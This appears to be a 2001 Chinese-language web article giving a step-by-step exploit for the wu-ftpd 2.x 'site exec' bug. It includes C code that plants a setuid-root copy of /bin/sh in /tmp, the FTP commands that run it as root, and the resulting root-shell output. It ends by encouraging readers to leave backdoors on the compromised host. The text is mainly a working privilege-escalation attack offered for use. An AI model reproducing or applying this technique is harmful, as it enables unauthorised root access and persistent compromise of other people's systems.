![[ 永遠的UNIX::UNIX技術資料的寶庫 ]](/images/title.gif) GB | BIG5
|
| 首頁 > 安全技術 > 其它 > 正文 |
 |
| 如何使用wu-ftp 2.x(site exec bug)來取得root權限 |
| 本文出自: 作者: (2001-07-15 07:05:00) |
1.需求:
(1)該主機的 ftpd 使用 wu-ftp 2.x 版本
(2)您必須有該主機的任何一個帳號
2.步驟:
(1)先 telnet login 到主機您的目錄下...
(2)使用 cc -o bug bug.c 將下列程式編譯...
--< bug.c >-----------------------------
#include
#include
#include
main()
{
seteuid(0);
system("cp /bin/sh /tmp/.sh");
system("chmod 6777 /tmp/.sh");
}
-----------------------------------------
編譯成功後會在您的目錄下產生 bug 這個檔案 (別忘了 chmod ...)
(3)使用 ftp login 到該主機下...
220 hackerforce FTP server (Version wu-2.4(1) Sun Jul 31 21:00:15 CDT 1997) ready.
Name (hackerforce:ftp): funky
331 Password required for funky.
Password: (password)
230 User funky logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> quote "site exec bash -c id" (檢查系統是否能利用此 bug)
200-bash -c id
200-uid=0(root) gid=0(root) euid=101(funky) egid=50(users) groups=50(users)
200 (end of 'bash -c id') (一但出現 euid=0 就成功了)
ftp> quote "site exec bash -c /yer/home/dir/ftpbug" (執行您剛編譯成功的 bug)
200-bash -c /your/home/dir/bug
200 (end of 'bash -c /your/home/dir/bug')
ftp> quit (離開 ftp)
221 Goodbye.
(4)再 telnet 進去該主機,執行 /tmp/.sh 這個 setuid root shell ...
$ id
uid=101(funky) gid=50(user)
$ /tmp/.sh
# id
uid=101(funky) gid=50(user) euid=0(root)
#
恭喜您...到此您就成功的拿到 root 權限了....
3.後記:
由於 wu-ftpd 執行時的 euid 是 root ,所以我們透過這個 hole 來執行執行外部的命令....
當編譯完的 bug 一但被執行,便會幫您將 /bin/sh 這個 shell 復制一份到 /tmp/.sh 下,並且
會將 /tmp/.sh setuid ,一但成功後只要任何使用者執行 /tmp/.sh 這個 setuid shell 就會雍
有 root 的 euid ....
一但您得手後,別忘了幫自己及別人多留些 backdoor... ;-)
(http://www.fanqiang.com)
進入【UNIX論壇】
|
|
| 相關文章 |
如何使用wu-ftp 2.x(site exec bug)來取得root權限 (2001-07-15 07:05:00)
如何配置WU-FTP服務器 (2001-06-27 08:10:01)
wu-ftpd使用基礎 (2001-06-27 07:00:00)
用wu-ftpd架設FTP服務器 (2001-05-10 10:15:45)
如何把 WU-FTPD 換成 ProFTPD? (2001-05-02 03:19:12)
|
|
|
|
|
★ 樊強制作 歡迎分享 ★ |